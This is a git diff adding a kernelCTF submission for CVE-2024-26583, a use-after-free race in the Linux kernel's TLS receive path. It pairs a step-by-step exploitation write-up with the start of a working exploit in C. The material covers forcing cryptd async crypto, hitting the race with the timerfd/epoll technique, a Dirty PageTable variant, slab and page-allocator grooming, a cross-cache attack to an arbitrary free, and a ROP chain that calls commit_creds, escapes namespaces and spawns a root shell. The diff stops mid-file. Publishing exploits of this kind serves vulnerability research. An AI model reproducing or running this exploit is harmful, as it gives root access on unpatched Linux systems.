diff --git a/pocs/linux/kernelctf/CVE-2024-26583_lts/docs/exploit.md b/pocs/linux/kernelctf/CVE-2024-26583_lts/docs/exploit.md
new file mode 100644
index 000000000..a8dad7701
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2024-26583_lts/docs/exploit.md
@@ -0,0 +1,342 @@
+## Setup
+
+To trigger TLS encryption we must first configure the socket.
+This is done by enabling the "tls" ULP and then using setsockopt() with the SOL_TLS level:
+
+```
+	if (setsockopt(sock, SOL_TCP, TCP_ULP, "tls", sizeof("tls")) < 0)
+		err(1, "TCP_ULP");
+
+	static struct tls12_crypto_info_aes_ccm_128 crypto_info;
+	crypto_info.info.version = TLS_1_2_VERSION;
+	crypto_info.info.cipher_type = TLS_CIPHER_AES_CCM_128;
+
+	if (setsockopt(sock, SOL_TLS, TLS_TX, &crypto_info, sizeof(crypto_info)) < 0)
+		err(1, "TLS_TX");
+```
+
+This setsockopt() call triggers the allocation of the TLS context objects, which will be important later on during the exploitation phase.
+
+In the KernelCTF config PCRYPT (the parallel crypto engine) is disabled, so our only option to trigger async crypto is CRYPTD (the software async crypto daemon).
+
+Each crypto operation needed for TLS is usually implemented by multiple drivers.
+For example, AES encryption in CBC mode is available through aesni_intel, aes_generic or cryptd (a daemon that runs these basic synchronous crypto operations in parallel using an internal queue).
+
+The available drivers can be examined by looking at /proc/crypto, however those are only the drivers of the currently loaded modules. The Crypto API supports loading additional modules on demand.
+
+As seen in the code snippet above, we don't have direct control over which crypto drivers are going to be used for our TLS encryption.
+Drivers are selected automatically by the Crypto API based on the priority field, which is calculated internally to try to choose the "best" driver.
+
+By default, cryptd is not selected and not even loaded, which gives us no chance to exploit vulnerabilities in async operations.
+
+However, we can cause cryptd to be loaded and influence the selection of drivers for TLS operations by using the Crypto User API. This API is used to perform low-level cryptographic operations and allows the user to select an arbitrary driver.
+
+The interesting thing is that requesting a given driver permanently changes the system-wide list of available drivers and their priorities, affecting future TLS operations.
+
+The following code causes the AES-CCM encryption selected for TLS to be handled by cryptd:
+
+```
+	struct sockaddr_alg sa = {
+		.salg_family = AF_ALG,
+		.salg_type = "skcipher",
+		.salg_name = "cryptd(ctr(aes-generic))"
+	};
+	int c1 = socket(AF_ALG, SOCK_SEQPACKET, 0);
+
+	if (bind(c1, (struct sockaddr *)&sa, sizeof(sa)) < 0)
+		err(1, "af_alg bind");
+
+	struct sockaddr_alg sa2 = {
+		.salg_family = AF_ALG,
+		.salg_type = "aead",
+		.salg_name = "ccm_base(cryptd(ctr(aes-generic)),cbcmac(aes-aesni))"
+	};
+
+	if (bind(c1, (struct sockaddr *)&sa2, sizeof(sa2)) < 0)
+		err(1, "af_alg bind");
+```
+
+## What we start with and what can we do
+
+If we win the race condition, the vulnerability gives us a limited write primitive.
+To be exact, it gives us the ability to change an 8-bit integer value of 1 to 0 at offset 0x9c in the struct tls_sw_context_rx object, which is allocated from the general kmalloc-256 cache. The sketch below shows why spin_unlock_bh() produces exactly this single-byte write.
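+
+On x86_64 the kernel uses queued spinlocks, where only the least significant byte of the 32-bit lock word holds the actual lock state, and unlocking is a plain release store of 0 to that byte. A minimal userspace sketch of the layout (illustrative types and names, not actual kernel code):
+
+```
+struct qspinlock_sketch {
+	union {
+		unsigned int val;              /* whole 32-bit lock word    */
+		struct {
+			unsigned char locked;  /* 1 while held, 0 when free */
+			unsigned char pending; /* (tail bits omitted)       */
+		};
+	};
+};
+
+/* spin_unlock() boils down to a release store of 0 to the locked byte -
+ * this is the single 1 -> 0 write we get at offset 0x9c of the freed
+ * tls_sw_context_rx. */
+static void sketch_unlock(struct qspinlock_sketch *lock)
+{
+	__atomic_store_n(&lock->locked, 0, __ATOMIC_RELEASE);
+}
+```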
+
+The big problem is finding a victim object in which this limited write gives us the ability to escalate privileges, or at least to get a better exploitation primitive.
+
+In the case of the 5.15 kernel we were able to find an object with a refcount-like field that we could modify to turn the vulnerability into a use-after-free, but this proved impossible for 6.1.
+
+Instead, we used a variant of the Dirty PageTable technique. The usual situation with this technique is that we have full write access to a page table entry through a use-after-free, and we can arbitrarily modify the PFN to point the PTE at a physical page belonging to e.g. kernel code we want to patch.
+
+Here we have more limitations, but the basic idea is the same.
+
+An x86_64 page table takes 0x1000 bytes and consists of 512 8-byte entries.
+This means that if we manage to allocate a page table in place of the tls_sw_context_rx, we will be able to modify the byte at offset 0x4 of the PTE starting at offset 0x98.
+This byte lies in the PFN part of the PTE (the PFN is encoded in bits 12 to 52 of the PTE) and has to have a value of 0x01 for us to be able to change it to 0x00.
+
+The KernelCTF setup has 3.5 GB of physical memory, which translates to 0xe0000 physical pages, so PFNs should go from 0 to 0xe0000; but there are holes for PCI devices etc., so in practice the last PFN is around 0x11b200.
+
+Here's what an example PTE looks like for that last PFN:
+0x800000011b200867
+
+The 5th byte is 0x01, which is ideal for our write primitive.
+If we change it to 0x00, the entry will point at PFN 0x1b200 instead of 0x11b200.
+We can do the same with any PFN >= 0x100000.
+
+This is very promising, but we have to solve several issues to get to privilege escalation:
+
+- we have to remap a page table in place of the tls context. Page tables are allocated straight from the buddy allocator, so the physical page of the kmalloc-256 slab has to be discarded first.
+- this page table must map physical memory with PFNs >= 0x100000
+- we have to place some useful objects to write to after our PTE modification, i.e. at PFN-of-modified-PTE - 0x100000
+- these steps have to be pretty reliable, because the hard-to-hit race condition gives us a limited chance of success from the start - if the next stage worked only e.g. 10% of the time, the vulnerability could become hard to exploit in real conditions, especially if a failed attempt crashes the kernel.
+
+## Preparing memory allocations
+
+### "High" memory
+
+We have to ensure that the new page table allocated to replace the tls context will map PFNs >= 0x100000. This value is actually important for Linux memory management - physical memory on x86_64 is split into multiple zones.
+Zone DMA32 contains the memory below 4 GB (PFNs < 0x100000) and zone Normal the memory above this limit. Physical page allocation is pretty predictable when allocating a lot of memory - first the system tries to use zone Normal until it is empty, and then moves to DMA32.
+
+To improve the reliability of the exploit, we map a lot of "Normal" memory at the very beginning (g_high_mem in the exploit code) and release chunks of it before allocating the new user memory that will get its PTE modified (g_victim_mem).
+
+### "Low" memory
+
+We also need to make sure that the memory our modified PTE will point to contains a kernel object that can be used for privilege escalation.
+This is pretty simple: we just create a lot of xattr objects until the memory is almost full.
+For performance, the xattrs are split across multiple fds and stored in the g_low_xattr_fds array for later use; a sketch of this spray primitive follows.
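+
+The spray is built on tmpfs extended attributes. A minimal sketch of the two helpers, mirroring alloc_xattr_fd()/free_xattr_fd() from the exploit (the size convention assumes the 0x20-byte struct simple_xattr header):
+
+```
+#include <stdio.h>
+#include <err.h>
+#include <sys/xattr.h>
+
+/* Allocate one simple_xattr so that header + value is roughly `size`
+ * bytes. On tmpfs the kernel kmallocs a struct simple_xattr holding
+ * the value inline, plus a separate buffer for the name. */
+static void xattr_alloc(int fd, unsigned int id, size_t size, const void *val)
+{
+	char name[64];
+	snprintf(name, sizeof(name), "security.%u", id);
+	if (fsetxattr(fd, name, val, size - 0x20, XATTR_CREATE) < 0)
+		err(1, "fsetxattr");
+}
+
+/* Free it again - this kfree()s both the simple_xattr and its name. */
+static void xattr_free(int fd, unsigned int id)
+{
+	char name[64];
+	snprintf(name, sizeof(name), "security.%u", id);
+	fremovexattr(fd, name);
+}
+```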
+
+## Triggering use-after-free through race condition
+
+```
+	spin_lock_bh(&ctx->decrypt_compl_lock);
+	if (!atomic_dec_return(&ctx->decrypt_pending))
+[1]		complete(&ctx->async_wait.completion);
+[2]	spin_unlock_bh(&ctx->decrypt_compl_lock);
+}
+```
+
+To exploit the race condition we have to hit the window between lines [1] and [2] and perform the following actions:
+1. Close the socket to free the tls context (struct tls_sw_context_rx), leading to the discard of the slab page
+2. Allocate a new page table in place of the tls context.
+
+To hit this small window and extend it enough to fit our allocations, we turn to the well-known timerfd technique invented by Jann Horn.
+The basic idea is to set an hrtimer-based timerfd to trigger a timer interrupt during our race window and to attach a lot (as many as RLIMIT_NOFILE allows) of epoll watches to this timerfd, to make the time needed to handle the interrupt longer.
+For more details see the original [blog post](https://googleprojectzero.blogspot.com/2022/03/racing-against-clock-hitting-tiny.html).
+
+Exploitation is done in 2 threads - the main process runs on CPU 0, and a new thread (child_recv()) is cloned for each attempt and bound to CPU 1.
+
+| CPU 0 | CPU 1 |
+| -------- | -------- |
+| allocate tls context | - |
+| - | exploit calls recv() triggering async crypto ops |
+| - | tls_sw_recvmsg() waits on completion |
+| - | cryptd calls tls_decrypt_done() |
+| - | tls_decrypt_done() finishes the complete() call |
+| - | timer interrupts tls_decrypt_done() |
+| recv() returns to userspace unlocking the socket | timerfd code goes through all epoll notifications |
+| exploit calls close() to free tls context | ... |
+| exploit allocates a page table in place of tls context | ... |
+| - | interrupt finishes and returns control to tls_decrypt_done() |
+| - | spin_unlock_bh() writes to the PTE |
+
+## Ensuring the slab page is discarded
+
+struct tls_sw_context_rx is allocated from kmalloc-256. This cache uses single-page slabs storing 16 objects each.
+To ensure the slab page is discarded we have to meet the same requirements as in a cross-cache attack:
+
+- all objects in the same slab as the tls_sw_context_rx must be freed. All neighbouring objects are xattrs from the same kmalloc-256 cache and are freed before starting the race condition, which freezes the slab and puts it on a per-CPU partial list
+- the per-CPU partial list must be full, so that the slab is unfrozen after the tls context is freed
+- the per-node partial list must also be full, so that the slab is discarded instead of being moved to the per-node list
+
+All these requirements are met by freeing enough kmalloc-256 xattrs before the tls context is freed.
+
+## Checking for success
+
+If the PTE modification is successful, our user memory will point to physical memory full of simple_xattr objects whose data is under our control, so we just have to loop through the mmapped area looking for a pattern (here 0x4242424242424242) - if it is found, the first stage of the exploitation was successful and we move on to the second stage, implemented in the stage2() function.
+The physical memory is now mapped both at the user virtual address returned by mmap (g_victim_mem) and in kernel space for the xattr objects.
+
+## Second stage
+
+The xattr structure looks like this on 6.1:
+
+```
+struct simple_xattr {
+	struct list_head list;               /*     0  0x10 */
+	char *           name;               /*  0x10   0x8 */
+	size_t           size;               /*  0x18   0x8 */
+	char             value[];            /*  0x20     0 */
+};
+```
+
+We now have read/write access to every field of it, and we have to use this access to get a root shell.
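+
+A minimal sketch of locating the overlapping xattr in the remapped window and overlaying the structure (it mirrors the scan loop in one_attempt(); simple_xattr_view is a hypothetical userspace mirror of the struct above):
+
+```
+#include <stdint.h>
+#include <stddef.h>
+
+struct simple_xattr_view {
+	void   *next, *prev;   /* struct list_head - leaks heap pointers   */
+	char   *name;          /* kfree()d on removal - our free primitive */
+	size_t  size;
+	char    value[];       /* attacker-controlled bytes                */
+};
+
+/* Scan the remapped user window for the marker sprayed into the values. */
+static struct simple_xattr_view *find_victim_xattr(char *mem, size_t len)
+{
+	for (size_t off = 0; off + 8 <= len; off += 8) {
+		if (*(uint64_t *)(mem + off) == 0x4242424242424242ULL)
+			/* the marker sits at value[0], i.e. 0x20 into the object */
+			return (struct simple_xattr_view *)(mem + off - 0x20);
+	}
+	return NULL;
+}
+```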
+
+For a start, we get a free heap leak from the prev/next and name pointers, but unfortunately no function pointers.
+
+There are many possible approaches to get code execution; here we decided to use the name pointer to create an arbitrary free primitive - when an xattr is removed, kfree() is called on its name.
+
+We will use it to create a use-after-free on a struct key_restriction object:
+```
+struct key_restriction {
+	key_restrict_link_func_t check;      /*     0   0x8 */
+	struct key *             key;        /*   0x8   0x8 */
+	struct key_type *        keytype;    /*  0x10   0x8 */
+};
+```
+
+This object is used after a KEYCTL_RESTRICT_KEYRING operation, and its 'check' function pointer will be called when attempting to add a new key to the restricted keyring.
+
+To do this we have to know two things:
+- the heap address of the key_restriction object
+- the kernel text base (we could have leaked it externally with a side-channel, but it's not that hard to leak it from memory and keep the exploit self-contained)
+
+### Leaking info
+
+To leak more data we just have to replace some of the xattrs in our memory with a different object.
+Specifically, we would like to have access to a struct key - it has a pointer to the key_restriction object, and its key type pointer gives us a kernel text leak.
+
+```
+struct key {
+...
+	union {
+		struct keyring_index_key index_key;      /*  0x88  0x28 */
+		struct {
+			long unsigned int hash;          /*  0x88   0x8 */
+			long unsigned int len_desc;      /*  0x90   0x8 */
+			struct key_type * type;          /*  0x98   0x8 */
+			struct key_tag * domain_tag;     /*  0xa0   0x8 */
+			char * description;              /*  0xa8   0x8 */
+		};                                       /*  0x88  0x28 */
+	};
+...
+	struct key_restriction * restrict_link;          /*  0xd0   0x8 */
+};
+```
+
+### Allocating the key object
+
+Unfortunately, key objects are allocated from a dedicated cache (key_jar, single-page slabs, 16 objects per slab), so we have to perform a cross-cache attack.
+To make matters worse, to allocate the "low" memory we used large xattrs from kmalloc-4k, which uses 8-page slabs (order 3), so we can't expect to simply get the recently freed page back from the PCP (per-CPU pages) lists.
+To stay with order 0 pages we would have to limit the xattrs to 256 bytes, and this would slow down the allocation phase of the exploit too much.
+
+#### Discarding the xattrs page
+
+To discard the slab page we have to perform the same steps as we did when freeing the tls context.
+This puts at least one order 3 page in the PCP.
+
+### Moving the page from the PCP to the buddy allocator
+
+To move pages out of the PCP we have to free enough pages to exceed the upper limit of the given PCP cache (its 'high' value). Each time this limit is exceeded on a page free, the PCP will move a batch of existing pages to the buddy allocator.
+
+Fortunately, we don't have to guess how many pages need to be freed. The page allocator state is exposed in /proc/zoneinfo (this file is world-readable).
+
+Here's an example of the part describing the PCP status of zone DMA32 on CPU 1:
+```
+  cpu: 1
+              count: 185
+              high:  9096
+              batch: 63
+```
+
+We now know that we need to free 9096 - 185 = 8911 pages to move a batch of 63 to the buddy allocator.
+This zoneinfo file is parsed by the exploit (in the get_pagecount() function) to get real-time info on the page allocator state; a condensed sketch follows.
+
+The process of moving pages from the PCP to the buddy allocator takes place in the free_pcppages_bulk() function and starts with pages of the order that triggered the flush, then moves in a round-robin fashion over the other orders until the whole batch has been freed.
+Pages in free_pcppages_bulk() are taken from the tail of the list, so the pages freed last will be the last to be moved.
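+
+A condensed sketch of the zoneinfo parsing, mirroring parse_zoneinfo()/get_pagecount() from the exploit (zone DMA32, CPU 1; error handling omitted):
+
+```
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+/* Returns the current PCP page count for zone DMA32 / cpu 1; the number
+ * of page frees needed to force a flush is then roughly high - count. */
+static unsigned int pcp_count(unsigned int *high, unsigned int *batch)
+{
+	static char buf[10000];
+	FILE *f = fopen("/proc/zoneinfo", "r");   /* world-readable */
+	size_t n = fread(buf, 1, sizeof(buf) - 1, f);
+	buf[n] = '\0';
+	fclose(f);
+
+	char *t = strstr(buf, "zone DMA32");
+	t = strstr(t, "cpu: 1");
+	unsigned int count = atoi(strstr(t, "count: ") + 7);
+	if (high)
+		*high = atoi(strstr(t, "high: ") + 6);
+	if (batch)
+		*batch = atoi(strstr(t, "batch: ") + 7);
+	return count;
+}
+```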
+
+In the exploit, the prepare_pcp() function allocates enough order 3 pages to be able to trigger the flush; after the victim page is discarded, flush_pcp() frees them all.
+
+### Reusing order 3 pages from the buddy allocator for key_jar
+
+The next issue is getting our order 3 page back when requesting an order 0 page for the key_jar.
+This would be quite simple if we could allocate as many keys as we wanted - the first allocations would use the order 0 PCP pages, then buddy allocator pages of increasing order, until we eventually got to the page we want.
+
+Unfortunately, we are severely limited in the number of keys we can allocate - the limit is 200 keys with 20000 bytes total, so in the best-case scenario we would be able to allocate at most 12 pages, and probably fewer.
+
+We could try draining the PCP based on the info from /proc/zoneinfo and draining orders 0, 1 and 2 from the buddy allocator, but the reliability would probably be less than optimal, and we need this part of the exploit to be very reliable.
+
+So instead we add another step - we allocate an object that also uses order 0 pages but has no limits on its creation.
+
+For this we use a netlink allocation primitive - when a netlink message with size > 0x1000 is sent, the buffer for the message is allocated through vmalloc, which internally allocates order 0 physical pages.
+
+When allocating through netlink, we mark each page with a different pattern and then read our memory to figure out which netlink buffer was allocated in the user victim area.
+
+Then we can free just one netlink buffer, which will free 2 physical pages - that much we can easily allocate within the key limits that we have.
+
+Before the target netlink buffer is freed, we do some additional operations to increase stability:
+
+1. Allocate some keys in get_fresh_slabs() to fill potential holes in existing partial key_jar slabs
+2. Ensure we have a fresh, empty kmalloc-192 slab. Kmalloc-192 is used when creating a new key, and if it needed to allocate a new slab, it could take the target page that we need for the key object itself.
+
+This second operation uses get_pagecount() (the parsing of /proc/zoneinfo) to discover when exactly the new slab is allocated.
+
+The next step is to free the selected netlink buffer. We have to remember that 2 pages are freed.
+If we have detected that the first page was our target, it will be the second page allocated from the PCP (LIFO).
+To improve our chances once more, we try to get rid of this first extra page.
+This is done in drain_pcp_order0() with the help of get_pagecount() to detect when exactly the new page is allocated (we use xattrs for the allocations, so it would be impossible to determine the current slab state otherwise).
+
+Finally, we allocate new keys of the keyring type (only this type uses the link restriction mechanism).
+
+### Finding keys in memory and leaking kernel base
+
+We know that a key has a pointer to its key type struct, located at a fixed offset in the kernel image with the last 12 bits of the address fixed, so we use it to find the key in our memory and at the same time figure out the kernel base address.
+
+### Leaking the location of the key_restriction object
+
+We use keyctl() with KEYCTL_RESTRICT_KEYRING to allocate a key_restriction object, and we read its address from our key object (whose location we already know).
+
+### Triggering kfree() on the key_restriction object
+
+Now we replace the name pointer of the simple_xattr under our control and call unlink() on the associated file to trigger the removal of all of its xattrs.
+unlink() is used because removal via fremovexattr() would require us to know the name of the xattr, and this name now consists of the content of the key_restriction object.
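+
+A minimal sketch of the resulting arbitrary free primitive, reusing the simple_xattr_view overlay from the earlier sketch (backing_fd/fname stand for the tmpfs file holding the victim xattr; the names are illustrative):
+
+```
+#include <unistd.h>
+
+/* Every xattr name pointer is kfree()d when the backing tmpfs inode is
+ * destroyed, so pointing one at a kernel object frees that object. */
+static void arbitrary_free(struct simple_xattr_view *xptr, int backing_fd,
+			   const char *fname, char *kernel_target)
+{
+	xptr->name = kernel_target;   /* e.g. the key_restriction object */
+	close(backing_fd);            /* drop our reference to the file  */
+	unlink(fname);                /* evict the inode -> kfree(name)  */
+}
+```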
+
+Now we can easily allocate our fake key_restriction object using the xattr primitive once more.
+
+### Getting RIP control
+
+All we need to do now is try to add a new key to our restricted keyring, and the check function will be called, giving us RIP control.
+
+### Pivot to ROP
+
+The call to the key restriction check function looks like this:
+```
+	return keyring->restrict_link->check(keyring, key->type, &key->payload,
+					     keyring->restrict_link->key);
+```
+
+The fourth argument (RCX) is under our direct control, as we have just performed the use-after-free on the key_restriction object.
+Now we have to place our ROP chain at a known address that we will put into restrict_link->key.
+For this, we can use the leak from the xattr next pointer.
+All xattrs were freed, and we can now reallocate them with our ROP payload. One of them will be placed at the previously leaked pointer.
+
+Then we can pass control to the ROP chain using only 3 gadgets:
+
+```
+mov rax, qword ptr [rcx + 8]
+test rax, rax
+je 0xffffffff812bbdcf
+mov rsi, qword ptr [rcx]
+lea rdi, [rbp - 0x10]
+mov rdx, r14
+call __x86_indirect_thunk_rax
+```
+
+```
+push rsi
+jmp QWORD PTR [rsi+0x39]
+```
+
+and finally
+
+```
+pop rsp
+ret
+```
+
+## Second pivot
+
+At this point we have a full ROP chain and enough space available, but our standard privilege escalation payload relies on the ROP being at a known location, so we choose an unused read/write area in the kernel and use copy_user_generic_string() to copy the second-stage ROP from userspace to that area.
+Then we use a `pop rsp ; ret` gadget to pivot there.
+
+## Privilege escalation
+
+This time the execution is happening in the context of a syscall, so it's easy to escalate privileges with the standard commit_creds(init_cred); switch_task_namespaces(pid, init_nsproxy); sequence and return to a root shell.
diff --git a/pocs/linux/kernelctf/CVE-2024-26583_lts/docs/novel-techniques.md b/pocs/linux/kernelctf/CVE-2024-26583_lts/docs/novel-techniques.md
new file mode 100644
index 000000000..e69de29bb
diff --git a/pocs/linux/kernelctf/CVE-2024-26583_lts/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2024-26583_lts/docs/vulnerability.md
new file mode 100644
index 000000000..0fb28fd57
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2024-26583_lts/docs/vulnerability.md
@@ -0,0 +1,49 @@
+## Requirements to trigger the vulnerability
+
+- Kernel configuration: CONFIG_TLS and one of [CONFIG_CRYPTO_PCRYPT, CONFIG_CRYPTO_CRYPTD]
+- User namespaces required: no
+
+## Commit which introduced the vulnerability
+
+https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0cada33241d9de205522e3858b18e506ca5cce2c
+
+## Commit which fixed the vulnerability
+
+https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=aec7961916f3f9e88766e2688992da6980f11b8d
+
+## Affected kernel versions
+
+Introduced in 4.20. Fixed in 6.1.78, 5.15.159 and other stable trees.
+
+## Affected component, subsystem
+
+net/tls
+
+## Description
+
+TLS decryption works by calling recvmsg() on a TLS-configured socket.
+This will retrieve an encrypted message from the network stack and perform the decryption.
+The AEAD decryption work is submitted to the crypto subsystem in tls_do_decryption(), setting tls_decrypt_done() as a callback and calling crypto_aead_decrypt().
+
+If the decryption is done asynchronously, crypto_aead_decrypt() returns immediately with -EINPROGRESS instead of waiting.
+Execution then returns to tls_sw_recvmsg(), which waits for the async crypto operations to finish using a completion mechanism.
+
+When the decryption is finished, the crypto subsystem calls the tls_decrypt_done() callback function, which calls complete(), allowing tls_sw_recvmsg() to exit. When recvmsg() returns, the socket is no longer locked and it is now possible to close it, which causes all associated objects to be freed.
+
+Relevant tls_decrypt_done() code:
+
+```
+...
+	spin_lock_bh(&ctx->decrypt_compl_lock);
+	if (!atomic_dec_return(&ctx->decrypt_pending))
+[1]		complete(&ctx->async_wait.completion);
+[2]	spin_unlock_bh(&ctx->decrypt_compl_lock);
+}
+
+```
+
+The bug is a race condition - calling complete() at [1] allows the socket to be closed, which causes the ctx object to be freed, but ctx is later used as an argument to spin_unlock_bh().
+
+If an attacker manages to close the socket and reallocate the freed ctx with controlled data between points [1] and [2], they can manipulate memory using spin_unlock_bh().
+
+This is a very limited write primitive, as it only allows changing an 8-bit integer value of 1 to 0 at a fixed position in memory (a spinlock is basically a 32-bit unsigned integer with the least significant byte used for the actual lock value).
diff --git a/pocs/linux/kernelctf/CVE-2024-26583_lts/exploit/lts-6.1.74/Makefile b/pocs/linux/kernelctf/CVE-2024-26583_lts/exploit/lts-6.1.74/Makefile
new file mode 100644
index 000000000..5e01df06e
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2024-26583_lts/exploit/lts-6.1.74/Makefile
@@ -0,0 +1,9 @@
+INCLUDES =
+LIBS = -pthread -ldl
+CFLAGS = -fomit-frame-pointer -static -fcf-protection=none
+
+exploit: exploit.c kernelver_6.1.74.h
+	gcc -o $@ exploit.c $(INCLUDES) $(CFLAGS) $(LIBS)
+
+prerequisites:
+	sudo apt-get install libkeyutils-dev
diff --git a/pocs/linux/kernelctf/CVE-2024-26583_lts/exploit/lts-6.1.74/exploit b/pocs/linux/kernelctf/CVE-2024-26583_lts/exploit/lts-6.1.74/exploit
new file mode 100755
index 000000000..88b84175d
Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-26583_lts/exploit/lts-6.1.74/exploit differ
diff --git a/pocs/linux/kernelctf/CVE-2024-26583_lts/exploit/lts-6.1.74/exploit.c b/pocs/linux/kernelctf/CVE-2024-26583_lts/exploit/lts-6.1.74/exploit.c
new file mode 100644
index 000000000..ab6068c0d
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2024-26583_lts/exploit/lts-6.1.74/exploit.c
@@ -0,0 +1,1236 @@
+#define _GNU_SOURCE
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#include "kernelver_6.1.74.h"
+
+static char *g_mmapped_buf;
+static uint64_t g_kernel_text;
+static int g_debug;
+static int g_event1;
+static int g_sender_sock;
+
+void set_cpu(int cpu)
+{
+	cpu_set_t cpus;
+	CPU_ZERO(&cpus);
+	CPU_SET(cpu, &cpus);
+	if (sched_setaffinity(0, sizeof(cpu_set_t), &cpus) < 0) {
+		perror("setaffinity");
+		exit(1);
+	}
+}
+
+void set_cpu_all()
+{
+	cpu_set_t cpus;
+	CPU_ZERO(&cpus);
+	for (int i = 0; i < 4; i++)
+	{
+		CPU_SET(i,
&cpus); + } + if (sched_setaffinity(0, sizeof(cpu_set_t), &cpus) < 0) { + perror("setaffinity"); + exit(1); + } +} + +void get_kctf_flag() +{ + char buf[512]; + + + int fd = open("/flag", O_RDONLY); + + if (fd < 0) + return; + + size_t n = read(fd, buf, sizeof(buf)); + if (n > 0) { + printf("Flag:\n"); + + write(1, buf, n); + + printf("\n"); + } + + close(fd); +} + +static char *g_sh_argv[] = {"sh", NULL}; + +static int g_status; + +#define MMAP_SIZE 0x20000 +#define XATTR_HEAD_SIZE 0x20 +#define KEY_HEAD_SIZE 0x18 + +static int g_pwned; +static char *g_rop2; +static size_t g_rop2_len; + +#define ROP2_CONST_AREA 0x10 +#define ROP2_CONST_OFFSET 0x200 + +uint64_t kaddr(uint64_t addr) +{ + return g_kernel_text + addr - 0xffffffff81000000uL; +} + + +void __attribute__((naked)) after_pwn() +{ +// Fix user stack and recover eflags since we didn't do when returning from kernel mode + asm volatile( + "mov %0, %%rsp\n" + :: "r" (g_mmapped_buf + MMAP_SIZE - 0x100) + ); + + g_pwned = 1; + + + set_cpu(1); + + int pid = fork(); + + if (!pid) { + + if (setns(open("/proc/1/ns/mnt", O_RDONLY), 0) < 0) + perror("setns"); + + setns(open("/proc/1/ns/pid", O_RDONLY), 0); + setns(open("/proc/1/ns/net", O_RDONLY), 0); + + printf("\nGot root!!!\n"); + printf("Getting kctf flags ...\n"); + + get_kctf_flag(); + + printf("Launching shell, system will crash when you exit because I didn't bother with recovery ...\n"); + execve("/bin/sh", g_sh_argv, NULL); + _exit(0); + } + + waitpid(pid, &g_status, 0); + + + + printf("Shell exited, sleeping for 30 seconds, after that system might crash\n"); + + sleep(30); + _exit(0); +} + + +void rop_rax2rdi(uint64_t **rop_p) +{ + uint64_t *rop = *rop_p; + + *(uint64_t *) (g_rop2+ROP2_CONST_OFFSET) = kaddr(POP_RDI); // RCX == RW_BUFFER + +// rax -> rdi + *rop++ = kaddr(POP_RCX); + *rop++ = kaddr(RW_BUFFER+ROP2_CONST_OFFSET); + *rop++ = kaddr(PUSH_RAX_JMP_QWORD_RCX); + + *rop_p = rop; +} + +size_t prepare_rop2(uint64_t *rop2) +{ + uint64_t *rop2_start = rop2; + + + *rop2++ = kaddr(POP_RDI); + *rop2++ = kaddr(INIT_CRED); + *rop2++ = kaddr(COMMIT_CREDS); + *rop2++ = kaddr(AUDIT_SYSCALL_EXIT); + + // Namespace escape based on code by Crusaders of Rust + *rop2++ = kaddr(POP_RDI); + *rop2++ = 1; + *rop2++ = kaddr(FIND_TASK_BY_VPID); + + rop_rax2rdi(&rop2); // clobbers RCX + + *rop2++ = kaddr(POP_RSI); + *rop2++ = kaddr(INIT_NSPROXY); + + *rop2++ = kaddr(SWITCH_TASK_NAMESPACES); + + *rop2++ = kaddr(POP_R11_R10_R9_R8_RDI_RSI_RDX_RCX); +// eflags + *rop2++ = 0; + rop2 += 6; + +// Userspace RIP + *rop2++ = (uint64_t) after_pwn; + + *rop2++ = kaddr(RETURN_VIA_SYSRET); + + return (char *) rop2 - (char *) rop2_start; +} + +void prepare_rop(char *buf, uint64_t kern_addr) +{ + uint64_t g2 = kaddr(PUSH_RSI_JMP_QWORD_RSI_039); + + uint64_t *rop = (uint64_t *) (buf + 0x10); + + *(uint64_t *) (buf) = kern_addr + 0x10; + *(uint64_t *) (buf+8) = g2; + + *(uint64_t *) (buf + 0x10 + 0x39) = kaddr(POP_RSP); + + *rop++ = kaddr(POP_RDI_RSI_RDX_RCX); + + *rop++ = kaddr(RW_BUFFER); + *rop++ = (uint64_t) g_rop2; + *rop++ = ROP2_CONST_OFFSET + ROP2_CONST_AREA; + *rop++ = 0; + + *rop++ = kaddr(COPY_USER_GENERIC_STRING); + +// jump over 0x39 + *rop++ = kaddr(POP_RSI_RDI); + rop += 2; + + *rop++ = kaddr(POP_RSP); + *rop++ = kaddr(RW_BUFFER); +} + + +int alloc_xattr_fd_attr(int fd, char *attr, size_t size, void *buf) +{ + int res = fsetxattr(fd, attr, buf, size - XATTR_HEAD_SIZE, XATTR_CREATE); + if (res < 0) { + err(1, "fsetxattr"); + } + + return fd; +} + +int alloc_xattr_fd(int fd, unsigned int id, size_t size, 
void *buf) +{ + static char attr[512]; + + snprintf(attr, sizeof(attr), "security.%d", id); + alloc_xattr_fd_attr(fd, attr, size, buf); + + return fd; +} + +void free_xattr_fd(int fd, int id) +{ + static char attr[512]; + + snprintf(attr, sizeof(attr), "security.%d", id); + + fremovexattr(fd, attr); +} + + +ssize_t read_xattr_fd(int fd, int id, char *buf, size_t sz) +{ + static char attr[512]; + + snprintf(attr, sizeof(attr), "security.%d", id); + + ssize_t ret = fgetxattr(fd, attr, buf, sz); + + if (ret < 0) + err(1, "read_xattr_fd"); + + return ret; +} + + +#define DUP_CNT 1300 +#define EPOLL_CNT 590 + +int epoll_fds[EPOLL_CNT]; +int tfd_dups[DUP_CNT]; +static int event1; + +#define MAX_ATTEMPTS 30 +#define HIGH_MEM_CHUNK 0x1000*1500 +#define HIGH_MEM_SIZE HIGH_MEM_CHUNK*MAX_ATTEMPTS +#define PG_ALLOC_SIZE 0x200000 +#define HIGH_XATTR_CNT 0 +#define XATTR_CHUNK 100 +#define LOW_XATTR_CNT 120000 +#define XATTR_SLAB_CNT 8 +#define KEY_SLAB_CNT 16 +#define SLAB_CNT 16 +#define PARTIAL_CNT SLAB_CNT*12 +#define NEIGH_CNT SLAB_CNT*3-1 +#define PCP_MMAP_PAGES 12000 +#define NETLINK_CNT 100 +#define 